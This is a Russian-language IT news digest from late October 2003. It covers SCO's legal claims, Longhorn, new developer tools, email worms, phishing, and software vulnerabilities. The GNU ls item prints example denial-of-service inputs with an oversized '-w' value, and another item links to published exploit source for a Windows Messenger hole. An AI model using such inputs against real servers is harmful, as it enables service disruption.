Как сообщает linux.org.ru, SCO наконец-то ответила на возражения IBM. По их мнению, GPL не только недействительна, но и нарушает Конституцию США, копирайт, антимонопольное и экспортное законодательство. (Как остроумно заметили комментаторы, GPL ещё виновата в распространии рака, пожарах в Калифорнии и ожирении). Ещё один интересный пассаж - SCO заявляет, что Linux является неправомочной копией UNIX, структурирован и сделан неотличимым от UNIX, и практически является 'свободной' реалиацией UNIX предназначенной для уничтожения проприетарных операционных систем. Да... маразм крепчал... Подробности - http://www.groklaw.net/article.php?story=20031027193958740
28/10/2003 12:20 Билл Гейтс представил новую операционную систем.
Глава Microsoft Билл Гейтс (Bill Gates) впервые представил 27 октября на конференции Microsoft's Professional Developers Conference будущую версию Windows, известную также как Longhorn. По словам г-на Гейтса, продемонстрировавшем, как Microsoft может использовать возможности более мощных ПК, выход Longhorn, намеченный на 2006 год, будет самым важным событием десятилетия. В новой ОС пользователи смогут настраивать так называемые «стеки» файлов в зависимости от ключевых слов или автора, просматривать презентации коллег в режиме реального времени через скоростные беспроводные локальные соединения, а также получить, по обещаниям разработчиков, другие преимущества, которые должны сокрушить нынешний пессимизм сторонних наблюдателей. Кроме всего прочего, выход Longhorn стимулирует приобретение новых ПК, считают в Microsoft. По мнению г-на Гейтса, к 2006 году стандартный ПК будет включать в себя процессор с тактовой частотой не менее 6 ГГц, более 2 ГБ памяти, более 1 ТБ дискового пространства, а также более быстрые графические процессоры и сетевые подключения. Также у пользователей появится больше доступа к хот-спотам, и единственным ограничением для большего получения информации и контроля над ней останется ПО. Источник - http://www.cnews.ru
28/10/2003 12:11 Borland выпускает JBuilder X.
Фирма Borland выпускает очередную версию своего интегрированного средства разработки (IDE) JBuilder. Как заявляют ее представители, это обновление станет самым важным событием в мире интегрированных средств разработки для языке Java за последние два года. В названии новой версии JBuilder'а будет отсутствовать привычный порядковый номер. Вместо него добавится уже почти ставшая привычной буква X ( хотя тут просматривается и иной подтекст - выпускаемая версия является десятой по счету, а римская цифра Х как раз и обозначает десять). Таким образом дает пользователям понять, что JBuilder X теперь будет работать на платформе Macintosh, под управлением операционной системы Mac OS X. Данная версия JBuilder поддерживает J2SE 1.4 - последнюю на данный момент версию комплекта для разработки программного обеспечения на языке Java от фирмы Sun. В новой версии нам обещают более ста различных новинок. Основной упор делается на модернизированные средства для разработки графического интерфейса, традиционнно слабого места JBuilder по сравнению например с Delphi. Появятся визуальные средства для разработки веб-сервисов, а также удобные средства настройки, позволяющие быстро адаптировать написанное приложение для исполнения на серверах от разных производителей. Подробнее - http://www.compulenta.ru/2003/10/28/42849/
28/10/2003 11:17 Недельный отчет о вирусах Panda Software.
Опубликован традиционный еженедельный отчёт о вирусах компании Panda Software. В отчёте рассмотрены: три червя - Lohack.C, Flop.A и Sexer.A, троянец Sdbot.N и вирус Vix.A. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=203
28/10/2003 11:05 Россиян подозревают в обмане клиентов британских банков.
Ответственными за организацию фальшивой рассылки для клиентов британского банка Barclays могут оказаться преступники из России, сообщает сайт Silicon.com. "Похоже, что фальшивые письма идут из России и поступают клиентам через новозеландского провайдера, которого преступники могут сменить в любую минуту", - прокомментировал аферу специалист компании Clearswift, занимающейся обеспечением безопасности в сфере информационных технологий. В сентябре несколько сот клиентов банка Barclays получили электронные письма, написанные от имени банковской администрации. Авторы посланий просили адресатов сообщить ряд своих персональных данных, в том числе персональный идентификационный номер (PIN) и пароль. В действительности Barclays не имел никакого отношения к этой рассылке. Некоторое время назад в аналогичной ситуации оказались клиенты банка NatWest, расположенного в Шотландии. Эксперты по информационной безопасности уже сравнили фальшивые рассылки с печально известной "нигерийской аферой", известной также как "афера 419". Однако на сей раз источник угрозы для пользователей кроется ни в Нигерии, а в России, считают специалисты, хотя и не приводят при этом убедительных доказательств в пользу своей версии. Источник - http://www.viruslist.ru
28/10/2003 10:27 Новая лицензия для open-source - CPL.
Как сообщается на sysadmins.ru, на сайте Crew IT research labs опубликована статья содержащая новые принципы новой лицензии для open-source сообщества - CPL, в ней учтены наиболее режущие лазейки для коммерческих компаний, который существовали в иных лицензиях. Опубликована новая лицензия для open-source - Crew Lublic License. Подробности - http://crew.org.ru/cgi-bin/index.cgi?doc002
27/10/2003 20:13 "Sober" поет оду "Sobig".
Лаборатория Касперского" предупреждает о начале эпидемии сетевого червя "Sober". Данная вредоносная программа была обнаружена еще в субботу, однако сейчас наблюдается всплеск ее активности, что связано с началом рабочей недели. "Sober" является классическим сетевым червем, распространяющимся по электронной почте. Зараженные письма могут содержать различные заголовки, тексты на английском и немецком языках, а также имена и расширения (PIF, BAT, SCR, COM, EXE) вложенных файлов, что значительно затрудняет его идентификацию по внешним признакам. Например: Тема письма: New Sobig-Worm variation (please read). Текст письма: New Sobig variation in the net. You must change any settings before the worm control your computer! But, read the official statement from Norton Anti Virus! Имя вложенного файла: NAV.pif. Если пользователь имел неосторожность запустить вложенный в зараженное письмо файл, то "Sober" показывает на экране фальсифицированное сообщение об ошибке: File not complete! Народ, ну хватит уже запускть выполняемые файлы в почте! Да и заапгрейдиться уже давно пора. Да и АутлохЭкспресс - полнейший отстой! Пользуйте почтового клиента наших бтраьев-молдаван, ака The Bat! (просьба не считать рекламой). Источник - http://www.kaspersky.ru
27/10/2003 20:09 У молодежи выработались иммунитет к спаму и апатия к Интернету.
Мужчины менее эмоционально реагируют на спам, нежели женщины. Об этом свидетельствует новое исследование компании Pew Internet. Оказывается прекрасная половина человечества испытывает сильное беспокойство от всего, что связано с нежелательными коммерческими рассылками. 83% женщин честно признались, что чрезвычайно нервирует непристойный и оскорбительный контент спама. В то же время, сотрудники Pew Internet установили, что пользователи стали отправлять меньше электронных писем. Столь холодное отношение к услугам email вызвано опять-таки невероятным увеличением нежелательных рассылок. Мало того, 70% заявили, что спам сделал для них онлайновое времяпрепровождение неприятным и раздражающим занятием. А половина респондентов вообще потеряла доверие к электронной почте. Однако исследование показало, что молодые люди совершенно спокойно реагируют на спам. Почти 30% представителей возрастной группы 18-29 лет считают несанкционированные рассылки "обычной частью Интернета". Источник - http://www.runet.ru
27/10/2003 20:00 Банкоматы Сбербанка: новые проблемы.
В системе процессинга пластиковых карточек Сбербанка РФ произошел сбой. Клиенты Сбербанка, имеющие карточные счета, не могут снять наличные деньги ни в банкоматах, ни в отделениях Сбербанка. Об этом РБК сообщили сотрудники банка, пожелавшие остаться неназванными. По информации РБК, полученной в управлении общественных связей Сбербанка, специалисты банка сейчас работают над устранением данной проблемы. Как рассказали CNews.ru в пресс-службе Сбербанка, пока никаких официальных комментариев на эту тему они давать не готовы. Более того, наш собеседник не смог ни подтвердить, ни опровергнуть данную информацию. «Мы озаботили специализированное техническое управление банка вопросом о наличии или отсутствии проблем и о том, как они решаются; но пока никакой информации нам еще не предоставили», - сказал в интервью CNews.ru сотрудник пресс-службы. Впрочем, согласно официальной версии, опубликованной на сайте Сбербанка, проблемы с банкоматами связаны с проведением работ по вводу в эксплуатацию в центральном аппарате Сбербанка процессинговой системы Way4, в связи с чем с 8:00 до 16:00 по московскому времени был объявлен технический перерыв в обслуживании международных банковских карт. В пресс-службе также отметили, что единичные сбои в работе банкоматов происходят достаточно часто, чуть ли не ежедневно. Обычно это обусловлено какими-либо проблемами со связью. «Может быть, что-либо подобное произошло и в этот раз, однако сентябрьский опыт заставляет людей быть более осторожными, поэтому возник такой резонанс», - предположил наш собеседник. Напомним, что сегодняшний сбой – уже не первый в сети банкоматов Сбербанка. Не далее как полтора месяца назад, 16 сентября, московские владельцы сбербанковских пластиковых карточек в течение всего дня не могли добиться от банкоматов выдачи «своих кровных». Банкоматы при этом списывали со счетов клиентов соответствующие суммы. К вечеру неисправные аппараты были закрыты, а всем пострадавшим в результате этого технического сбоя была выдана наличность. Сотрудники главного офиса банка тогда объясняли случившееся техническим переоснащением компании, не вдаваясь в подробности того, какая именно техника была заменена. Источник - http://www.rbc.ru
27/10/2003 19:55 Очередная дыра в Wu-FTPd.
Как сообщает linux.org.ru, обнаружена возможность удаленного переполнения буфера в Wu-FTPd version 2.6.2 (с поддержкой SKEY). Удаленный атакующий может выполнить произвольный код на уязвимом сервере с привилегиями суперпользователя (либо повысить полномочия в системе). Подробности - http://www.securitylab.ru/40947.html
27/10/2003 19:49 I-Worm.Sober и I-Worm.Sexer.d: новые и старые знакомые.
Лаборатория Касперского" предупреждает о появления сразу двух опасных почтовых червей: I-Worm.Sober и новой модификации изрядно уже всем надоевшего "пиар-червя" Sexer. Оба червя не несут каких-либо деструктивных функций, однако благодаря успешному использованию методов маскировки под письма от известных компаний уже успели получить широкое распространение в интернете. Зараженные I-Worm.Sober письма содержат случайно выбранную из заранее определенного списка тему и соответствующий ей текст и имя файла-вложения. В качестве обратного адреса подставляется адрес зараженного червем компьютера, с которого производилась рассылка. Таким образом зараженные письма могут маскироваться, например, под информацию о новой версии червя Sobig от одной из компаний-производителей антивирусного ПО, пришедшую со знакомого вам адреса. Тем временем, I-Worm.Sexer.d продолжает начатую больше недели назад кампанию то ли за, то ли против господина Германа Стерлигова. Новая версия червя выставляет в качестве заставки рабочего стола Windows картинку с уже знакомым нам по Sexer.a текстом и отличается от своих "собратьев" лишь размером и названием вложенного файла и темой и текстом зараженных писем. Любопытно отметить, что новая версия червя в своих методах маскировки под письмо от Microsoft использует английский язык и потому становится потенциально опасной для заграничных пользователей (хотя какое им-то дело до предвыборных страстей российской столицы?). Источник - http://www.viruslist.ru
26/10/2003 15:14 Конфигурирование Apache 2.0 в качестве прокси-сервера.
Опубликована довольно интересная статья Мартина Брауна (Martin Brown), посвящённая описанию процесса настройки популярного Вэб-сервера Apache ветви 2.0 в качестве форвардящего прокси-сервера. Многие системные администраторы знают, что Apache, помимо задач обработки HTTP-запросов (Вэб-сервер), может ещё выступать в качестве прокси-сервера (сервера-посредника). Обычно эту особенность Апача отключают для обеспечения безопасности, однако, как пишет автор, этой фичей можно довольно успешно воспользоваться, соответствующим образом настроив доступ к серверу. Статья - http://www.serverwatch.com/tutorials/article.php/10825_3092521_1
26/10/2003 15:08 Выход Darwin OS 7.0.
Продолжая тему операционных систем, хотелось бы отметить, что от имени разработчиков Apple, группа Darwin анонсировала доступность на их сайте исходных кодов новой версии ОС - Darwin OS 7.0. Эта версия соответствует Mac OS X 10.3. Также через репозитарий CVS доступны обновления продуктов: gcc, gdb, cups, efax, gimp-print, tcl, Rendezvous, StreamingServer, HeaderDoc. Подробности - http://www.opensource.apple.com/darwinsource/10.3/
26/10/2003 15:04 Выход FreeBSD 4.9 RC4.
как сообщает nixp.ru, не прошло и недели, как за RC3 вышел четвертый кандидат в релиз (RC4) FreeBSD 4.9. Ниже приведена ссылка на ISO-образ этой популярной ОС (размер ~ 650 МБ). Образ - ftp://ftp.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/4.9-RC4-i386-disc1.iso
26/10/2003 13:08 Интернет-конференция Александра Лукашенко закончилась провалом.
Прямая видеотрансляция в Сети пресс-конференции на тему белорусско-российских отношений сорвана. За час работы президентский сайт так и не "открылся" пользователям. В компании "Белтелеком", являющейся интернет-провайдером трансляции, случившееся объяснили двумя причинами: перегрузка канала в связи с большим количеством пользователей, одновременно желающих следить за ходом трансляции, и возможностями самого сайта. Как сообщил "Интерфакс", не исключена вероятность хакерской атаки на сайт. В отделе передачи данных РО "Белетелеком" отметили, что "с точки зрения технического обеспечения никаких нарушений нет, транспортная сеть находится в рабочем состоянии. Скорость трафика от президентского сайта составляет 150-180 килобит в секунду". Источник - http://www.runet.ru
26/10/2003 12:33 Статья "Борьба с Интернет-червями при помощи honeypot".
На известном сайте SecurityFocus опубликована статья Laurent OUDOT (инженер по компьютерной безопасности Комитета по атомной энергии Франции) под названием "Fighting Internet Worms With Honeypots". В статье рассказывается, как применить технологию honeypot для перехвата червя, перенаправления траффика на подставные сервисы, настройки счётчика нападений червей, удаления последствий атаки. Статья - http://www.securityfocus.com/infocus/1740
26/10/2003 12:15 В Mandrake Linux 9.2 обнаружены серьезные проблемы.
Как сообщает linuxcenter.ru, несмотря на тщательный процесс тестирования, предшествовавший выпуску юбилейной версии Mandrake Linux 9.2 "Five Star", в последнюю вкрались ошибки, серьезность которых варьируется от отстутствия исходных текстов ядра в оригинальных ISO-образах до непонятной проблемы, приводящей к поломке приводов CD-ROM от LG Electronics. Как сообщают в компании, LG не тестирует свои продукты на совместимость с Linux и не поддерживает эту ОС. Выход из сложившейся ситуации пока не найден, так что лучше не пытайтесь установить Mandrake Linux 9.2, если Ваш привод CD-ROM произведен LG Electronics! Подробности - http://www.mandrakelinux.com/en/errata.php3
26/10/2003 12:00 Эволюция и перспективы резервного копирования данных.
На сайте CITFORUM опубликована статья Алескандра Горлового "Эволюция и перспективы резервного копирования данных", в бумажном виде опубликованная в журнале "Экспресс - Электроника" (#6, 2003). В статье автор рассматривает современное состояние систем резервного копирования (с приведением конкретных примеров готовых решений), а также рассматривает перспективы этой важной отрасли программного (и хардварного, в том числе) обеспечения. Статья - http://www.citforum.ru/hardware/articles/backup/
26/10/2003 11:50 Калифорнийский суд оштрафовал спамеров на два миллиона долларов.
Калифорнийский суд впервые в истории штата приговорил компанию к крупному штрафу за рассылку спама, сообщает BBC News. Владельцы местной компании PW Marketing должны будет выплатить два миллиона долларов за рассылку по электронной почте огромного количества рекламных писем. Генеральный прокурор Калифорнии Билл Локьер (Bill Lockyer) подал в суд на Пола Уиллиса (Paul Willis) и Клаудию Гриффин (Claudia Griffin) в 2002 году. Он заявил, что владельцы фирмы нарушили антиспамовский закон штата 1998 года. В прошлом месяце ответственность за нарушение этого закона была ужесточена. В ходе следствия было установлено, что PW Marketing разослала жителям штата миллионы писем, в которых собственно рекламировалась инструкция по организации массовой рекламной рассылки. Стоимость инструкции составляла 39 долларов. Главным нарушением, которое сыграло решающую роль в вынесении приговора, было то, что в письмах не содержался телефон, по которому получатели рекламы могли позвонить и попросить вычеркнуть себя из списка рассылки. Кроме того, в рекламе был неправильно указан адрес компании. Подробности - http://news.bbc.co.uk/2/hi/technology/3213161.stm
25/10/2003 15:48 Переполнение буфера в GNU File Utilities.
Две уязвимости обнаружены в "ls". Злонамеренный пользователь может вызвать отказ в обслуживании. Программа ls может использовать чрезмерные ресурсы памяти системы, если представлен чрезмерно длинное значение к "-w" параметру. Также в программе обнаружено целочисленное переполнение буфера. Пример: /bin/ls -w 1073741828 -C. Уязвимость может также эксплуатироваться удаленно через приложения, которые вызывают ls без фильтрации ввода (например, WU-FTPD). Пример: ls "-w 1000000 -C" Подробности - http://www.securitylab.ru/40925.html
25/10/2003 13:41 Microsoft изобрел почту, которая уничтожает себя.
Новый программный пакет Microsoft Office позволит отправленным сообщениям электронной почты самоуничтожаться спустя заданное время. Компания считает, что это позволит повысить безопасность пользования е-мейлом. Как говорят представители Microsoft, пользователи смогут сами решать, кому разрешить читать послания. Таким образом, можно будет ограничить круг лиц, кому данное сообщение предназначается, и запретить перенаправлять почту и даже распечатывать ее. Новая программа, получившая название Information Rights Management ("Управление правами на информацию"), может использоваться правительственными учреждениями и компаниями для предотвращения утечек информации. Представители Microsoft говорят, что Office 2003, который появится в продаже в этот вторник, позволит отправителям почты устанавливать время, по истечении которого сообщение будет просто самоуничтожаться. В Office 2003 включено также программное обеспечение, которое предназначено для защиты конфиденциальной информации в файлах, созданных в программах Microsoft Excel и Word. Источник - http://www.bbc.co.uk
25/10/2003 13:33 Мошенничество с пластиковыми картами.
Британские банки ежегодно теряют около 300 млн. фунтов стерлингов в результате мошенничества с пластиковыми карточками. К 2005 году эти цифры, по подсчетам экспертов, могут возрасти до 800 млн. фунтов, передает корреспондент РИА "Новости". В связи с этим, британское банковское сообщество начало переговоры с министерством внутренних дел о выделении средств на усиление спецподразделений по борьбе с этими видами преступлений. Банки и компании, имеющие отношение к выпуску и обеспечению хождения пластиковых карточек, также планируют к 2004 году ввести в обращение в Великобритании так называемые "смарт-карты", которые имеют повышенный уровень защиты. Проект оценивается в 1,1 млрд. фунтов стерлингов. Великобританские сыщики периодически 'накрывают' преступные группы, которые грабят банки и их клиентов с помощью поддельных пластиковых карт. При этом мошенники создают целую сеть из подручных и подельщиков - они пополняют 'банки данных' преступников о номерах и кодах пластиковых карт. Источник - http://www.rian.ru
25/10/2003 12:16 Новинка от Intel повышает безопасность.
На этой неделе корпорация Intel представила новую материнскую плату, на которой установлен модуль TPM (Trusted Platform Module), предназченный для хранения ключей, которые применяются для шифрования/дешифрования передаваемых данных. Модуль представляет собой стандартное дополнение к материнки и состоит из чипа и небольшой памяти для хранения создавемых ключей, которые позволяют на лету работать с зашифрованными данными. Для доступа к зашифрованному документу клиентское ПО предлагает пользователю ввести пароль, на основе которого и формируются пары ключей. Mark Atkinson, менеджер Intel, заявил в интервью ZDNet UK, что модуль стоит всего 5$ и скоро будет доступен для корпоративных пользователей. Подробности - http://zdnet.com.com/2100-1105_2-5096100.html
25/10/2003 11:54 Выход октябрьского номера журнала "Системный администратор".
Вышел очередной, октябрьский номер популярного в определённых кругах журнала "Системный администратор". Можно отметить следующие интересные статьи: Планирование и управление дисковым пространством в ОС Linux используя LVM (Logical Volume Manager); Установка IMAP4-сервера на базе cyrus-imapd + sendmail на Slackware Linux; Обнаружение атак, установка и настройка Snort; Знакомство с дистрибутивом ASPLinux 7.3 Server Edition; Реализация SMTP AUTH в Postfix (без SSL); Обзор СensorNet - дистрибутив, базирующийся на Debian, предназначен для организации доступа в Интернет, для управления и мониторинга пользователей, подключенных к Интернету; Основные операции с модулями ядра Linux, пример создания собственного модуля; Кодер/декодер Рида-Соломона, выполненный на базе арифметики Галуа. Подробности - http://www.samag.ru/
25/10/2003 10:51 Дистрибутив инструментов разработки eXPressor 1.1.
Вышла новая версия дистрибутива инструментов разработки eXPressor 1.1 для платформы программирования Java, основанного на свободном программном обеспечении и адаптированного к реализации проектов с использованием методологии экстремального программирования. В рамках общей концепции дистрибутива наиболее интересными нововведениями по сравнению с предыдущей версией являются планировщик XPlanner и инструмент тестирования JMeter. Среди других обновлений - Apache Tomcat 5.0.12, GanttProject 1.9.9, BlueJ 1.3.0, JRefactory 2.8.9, IzPack 3.2.1, Java 2 SDK 1.4.2_02, Eclipse SDK 3.0M4 и т.д. Дополнительно компакт-диски содержат свободно распространяемые версии некоторых продуктов с закрытым исходным кодом - Poseidon for UML 2.0.4 Community Edition, Visual Paraigm for UML 2.2 Community Edition, Borland JBuilder 9 Personal Edition, ZeroG InstallAnywhere Now! 5.5. Подробности - http://www.if-site.com/progress/prod/expr
25/10/2003 10:46 Big Mac — один из самых мощных суперкомпьютеров в мире.
Суперкомпьютер, построенный Вирджинским политехническим институтом и университетом штата (Virginia Tech) из 1100 двухпроцессорных ПК Macintosh G5, может попасть в пятерку самых быстродействующих машин в мире, несмотря на свою смешную цену. В предварительных тестах производительности, выполненных на 2112 из 2200 процессорах системы, так называемый кластер Big Mac показал 8,1 терафлопс, или триллионов операций в секунду. Система еще отлаживается, и окончательные результаты будут объявлены не ранее следующего месяца, но полученные цифры, опубликованные в среду, ставят Big Mac на четвертое место в списке 500 самых быстродействующих компьютеров. Эти цифры примечательны, в частности, тем, что аппаратуры Macintosh долгое время вообще не было в этом списке, а также стоимостью Big Mac. Традиционно самые быстродействующие компьютеры стоят от 100 млн долл. до 250 млн долл. и на их создание уходит несколько лет, тогда как система на базе «Маков» обошлась немногим более 5 млн долл. и собрана чуть ли не за месяц. Подробности - http://zdnet.com.com/2100-1103_2-5095026.html
24/10/2003 18:48 Уязвимость в Java.
Группа LSD (Last Stage of Delirium) сообщает об уязвимости в Java. В частности, уязвимости подвержены: SDK/JRE 1.4.1_03, SDK/JRE 1.3.1_08, SDK/JRE 1.2.2_015. Уязвимость связана с некорректной проверкой загрузки классов (Class Loader's checks). Вданном случае уязвимость кроется в классе sun.applet.AppletClassLoader. Используя данную уязвимость злоумышленник может загрузить без проверки произвольный файл в "песочницу" (которая, напомними, объявлялась SUN, как средство безопасного выполнения кода) и выполнить его там. Необходимо отметить, что господа из SUN выпустили обновлённые версии SDK и JRE. Подробности - http://sunsolve.sun.com/pub-cgi/retrieve.pl?...
24/10/2003 17:10 Создание международного центра противодействия хакерам.
Internet Software Consortium (ISC) организовал международный антикризисный координацонный центр противодействия хакерам. Сие заведение названо гордым назвнием "The Operations, Analysis and Research Center (OARC)". Задача - исследование и мониторинг Интернет-траффика для обнаружения попыток атак на корневые ДНС-сервера. В OARC вошли - Internet Society, Cisco Systems, MCI, XO Communications, UltraDNS, TLD operator Afilias, Verio и другие хозяева корневых ДНС-серверов (если кто не знает - их 12 в зоне root). Инициатива вполне закономерная в свете последних атак, которые предпринимались на основу Интернет - DNS. Подробности - http://www.computerweekly.com/articles/article.asp?...
24/10/2003 14:12 Сайт о настройке SQUID.
Довольно любопытный и полезный для начинающих СИСАДМИНов сайт, посвящённый настройке популярного в мире *NIX прокси-сервера SQUID для того, чтобы вырезать из траффика рекламы, порнографии и MP3. На сайте приведены, помимо общих рекомендаций по установке и настройке приводятся обновляемые списки блокировок, редиректор, инструкции по установке и настройке. И название у сайта соответствующее - "Режик". :) Сайт - http://www.rejik.ru/
24/10/2003 13:56 МВД России будет активизирует борьбу с подставными компаниями в Интернете.
"На сегодняшний день озабоченность органов внутренних дел вызывает использование мошенниками Интернета для выстраивания финансовых пирамид", - отметил начальник Федеральной службы по борьбе с экономическими и налоговыми преступлениями (ФСЭНП) МВД РФ Сергей Веревкин-Рахальский. По его словам, речь идет о том, что подставные компании через Интернет набирают штат участников - держателей пластиковых кредитных карт, на которые необходимо внести первоначальный взнос. Затем на эти карты виртуально начисляются "значительные денежные средства", которые используются для совершения покупок несуществующего товара в интернет-магазине. После этого мошенники производят отмену всех операций возврата, а денежные средства с платежных карт снимаются и компания-организатор исчезает Источник - http://www.runet.ru
24/10/2003 13:43 Авторегулирование подкачки подсистемы виртуальной памяти.
Как сообщает dotcoder на linux.org.ru, Con Kolivas выпустил патч, который налету регулирует "подкачку" в подсистеме виртуальной памяти, в зависимости от используемого приложениями процента ОЗУ (при этом размер дискового кэша в счет не принимается). Патч работает по принципу "выделять побольше памяти часто-используемым/текущим приложениям, а приложения, которые используются редко, помещать в подкачку". Подробности - http://kerneltrap.org/node/view/1044
24/10/2003 13:39 Дыра в браузере Opera.
Компания AtStake сообщила об обнаружении опасной дыры в браузере Opera версий 7.11 и 7.20 для платформ Windows и Linux. Другие версии браузера не тестировались, и о том, есть ли в них указанная дыра, точно неизвестно. Обнаруженная уязвимость носит критический характер и позволяет злоумышленнику выполнить на компьютере жертвы произвольный код. Уязвимость в Opera связана с переполнением буфера при обработке некоторых гиперссылок. Для использования дыры хакер должен создать веб-страницу с особым образом записанной ссылкой. При рендеринге такой страницы произойдет ошибка, позволяющая хакеру делать с системой все, что угодно. Атаку можно проводить как на сам браузер, так и на почтовый клиент, поставляющийся в комплекте с браузером. Дыра была обнаружена специалистами AtStake в конце сентября. На устранение дыры у разработчиков Opera ушли две недели. Итогом этой работы стал выпуск версии браузера за номером 7.21. В Opera не выпускали никаких специальных бюллетеней по факту обнаружения дыры, она упоминается в списке изменений как устранение сбоя в браузере при обработке неправильных имен серверов. Подробности - http://www.atstake.com/research/advisories/2003/a102003-1.txt
24/10/2003 12:05 I-Worm.Sexer.c: размножение "делением".
Сообщается появлении очередной разновидности червя Sexer - Sexer.c. Jтличается от предыдущей версии лишь размером вложения. За счет значительного сжатия выставляемой в качестве заставки рабочего стола картинки размер файла KAVUtil.exe уменьшился с 310KB до 97KB. Эксперты компании предупреждают: количество случаев заражения версией Sexer.c на порядок больше числа зафиксированных случаев заражения предыдущей версией! Для детектирования и лечения I-Worm.Sexer.c уже выпущено срочное обновление баз "Антивируса Касперского". Источник - http://www.kaspersky.ru
23/10/2003 17:42 Ещё один эксплоит уязвимости Messenger.
Опубликован ещё один эксплоит уязвимости в сервисе Messenger OC Windows XP/2K (MS03-043). На этот раз код, изначально написанный Hanabishi Recca для платформы win32, портирован VeNoMouS для ОС Linux. Исходник эксплоита - http://packetstorm.linuxsecurity.com/0310-exploits/ms03-043.c
23/10/2003 17:26 Использование GRUB.
Cайт opennet.ru приводит ссылку на довольно интересную статью, посвящённую загрузчику Linux - GRUB (Grand Unified Boot Loader), который постепенно приходит на смену традиционному LILO. Cтатья опубликована на сайте IBM и называется "Getting to know GRUB". Для прочтения (к сожалению) необходима регистрация. Статья - https://www6.software.ibm.com/reg/devworks/dw-linuxgrub-i?...
23/10/2003 17:08 Среда разработки нового поколения от Borland.
Корпорация Borland объявила о выпуске JBuilder X - новой версии многоплатформенной интегрированной среды разработки (IDE) для Java. JBuilder X насчитывает более 100 новых и усовершенствованных функциональных возможностей, призванных значительно повысить производительность труда корпоративных разработчиков, а также специалистов, уделяющих основное внимание работе с исходными текстами программ на Java. Новые возможности продукта направлены в основном на повышение продуктивности и удобства работы, а также на облегчение создания и развертывания Web-приложений, Web-служб и систем на основе компонентной модели EJB на платформе J2EE. Среда JBuilder X может быть расширена при помощи интерфейсов программирования (API) Open Tools, основанных на технологии Java Swing. JBuilder X выпускается с более чем 80 повторно используемыми компонентами и модулями расширения (plug-ins) от сторонних разработчиков. Вместе с новой версией среды разработки поставляются подключаемые модули от таких компаний, как Altova, Crystal Decisions, Oracle, Salesforce.com, Sun и Sybase. Источник - http://osp.ru
23/10/2003 17:03 Две новинки "Физтех-софта".
Компания "Физтех-софт" выпустила два новых программных продукта, предназначенных для защиты конфиденциальной информации. Система защиты информации StrongNet предназначена для построения защищенных виртуальных частных сетей (VPN) и обеспечения безопасной работы компьютера в сети. StrongNet использует схему предварительного распределения ключей аутентификации между пользователями, что устраняет необходимость создания и поддержки удостоверяющих центров (Certificate Authority). Для аутентификации могут использоваться любые электронные ключи или смарт-карты, которые поддерживают международный стандарт PKCS#11 (iKey 10xx/20xx, eToken R2/Pro, CryptoIdentity5, ePass 1000/2000). В состав продукта входит также встроенный firewall, осуществляющий фильтрацию входящего и исходящего трафика. Второй новый продукт "Физтех-софта" - система защиты информации StrongServer for Linux - представляет собой комплексное решение для широко распространенной модели сетей с операционной системой Linux на сервере и MS Windows или Linux на клиентских местах. StrongServer for Linux включает защиту информации непосредственно на сервере, а кроме того, обеспечивает защиту данных, передаваемых по сети между сервером и удаленными клиентами. Управление доступом к защищенной информации на сервере может осуществляться при помощи защищенного Web-интерфейса с любого компьютера через Internet-браузер (при этом все передаваемые по сети данные шифруются). Источник - http://www.osp.ru
23/10/2003 16:56 Хакеры выманивают корпоративные пароли.
По мере того, как возрастает защищенность ИТ-инфраструктуры компаний, хакеры все больше обращаются к методам социального инжиниринга, чтобы выманить у неосторожных пользователей пароли для входа в корпоративные сети. Как показало новое исследование, проведенное специалистами по информационной безопасности, когда дело доходит до выбора и сохранения в тайне паролей, рядовые пользователи все еще выступают в роли слабого звена. Согласно исследованию, проведенному консалтинговой компанией NCC Group, 15% участников онлайнового опроса, которым предложили ввести свой пароль для входа в корпоративную сеть, чтобы поучаствовать в розыгрыше приза, были готовы без лишних сомнений предоставить эту информацию. По словам Пола Влиссидиса (Paul Vlissidis) из NCC Group, основная проблема персонала, и особенно – ИТ-служб, которые должны лучше разбираться в предмете, - это халатное отношение к паролям, что ставит под угрозу защищенность корпоративных сетей. "Вопрос заключается в том, что лень и невежество приводят к проблемам с безопасностью сетей, - отмечает он. – Пароли играют сейчас еще большую роль – с появлением широкополосной связи в домах все больше сотрудников пользуются удаленным соединением". И по мере того, как ИТ-подразделения совершенствуют защиту офисных сетей, хакерам приходится все чаще прибегать к методам социального инжиниринга, чтобы выманить пароли у пользователей. Источник - http://www.cnews.ru
23/10/2003 16:31 Microsoft продолжает открывать исходники Windows.
Компания Microsoft объявила о расширении программы Shared Source, в рамках которой компании и отдельные специалисты могут знакомиться с исходным кодом программных продуктов софтверного гиганта. В настоящее время программа осуществляется по нескольким направлениям, и доступ к исходному коду продуктов Microsoft имеют различные организации - от системных интеграторов до государственных ведомств. Новое направление в рамках программы Shares Source получило название Most Valuable Professional Source Licensing Program (MVPSLP). В ее рамках доступ к исходному коду операционных систем Microsoft получат доступ избранные специалисты по продуктам Microsoft. Под категорию "особо ценных профессионалов" (Most Valuable Professional или MVP) подпадают индивидуальные специалисты по одному или нескольким продуктам Microsoft, активно тестирующие продукты Microsoft, участвующие в специализированных онлайновых и оффлайновых сообществах и помогающие компаниям и организациям решать технические задачи различной степени сложности. На данный момент доступны коды операционных систем Windows 2000, Windows XP и Windows Server 2003. Источник - http://www.compulenta.ru
23/10/2003 16:19 Очередной криптоконкурс.
Как сообщает bugtraq.ru, Thawte Consulting объявила об очередном конкурсе на вскрытие зашифрованного текста, который начнется 27 октября. Для решения поставленной задачи не потребуются значительные вычислительные ресурсы - по крайней мере, в предыдущих конкурсах использовались вариации на тему достаточно простых подстановочных шифров. Победитель получит экземпляр книги Митника "The Art of Deception". Подробности - http://www.thawte.com/cryptochallenge/
23/10/2003 16:06 SuSE Linux обновила конкурента Exchange.
